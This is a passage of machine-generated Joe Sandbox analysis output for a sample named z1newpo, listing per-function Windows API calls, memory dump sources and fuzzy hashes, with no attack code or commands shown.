                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                    • _wcslen.LIBCMT ref: 004458FB
                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 3087257052-0
                                                    • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                    • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                    APIs
                                                      • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 245547762-0
                                                    • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                    • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                    • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 004471D8
                                                    • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                    • SelectObject.GDI32(?,00000000), ref: 00447228
                                                    • BeginPath.GDI32(?), ref: 0044723D
                                                    • SelectObject.GDI32(?,00000000), ref: 00447266
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Object$Select$BeginCreateDeletePath
                                                    • String ID:
                                                    • API String ID: 2338827641-0
                                                    • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                    • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                    • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00434598
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                    • Sleep.KERNEL32(00000000), ref: 004345D4
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                    • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                    • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 4023252218-0
                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                    APIs
                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 1489400265-0
                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1042038666-0
                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                    • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                    • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041780F
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __getptd.LIBCMT ref: 00417826
                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                    • __lock.LIBCMT ref: 00417844
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 2403457894-0
                                                    • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                    • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                    • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                    APIs
                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                    • __freefls@4.LIBCMT ref: 00415209
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                    • String ID:
                                                    • API String ID: 4247068974-0
                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$U$\
                                                    • API String ID: 0-3705770531
                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                    APIs
                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                    • String ID: .lnk
                                                    • API String ID: 886957087-24824748
                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
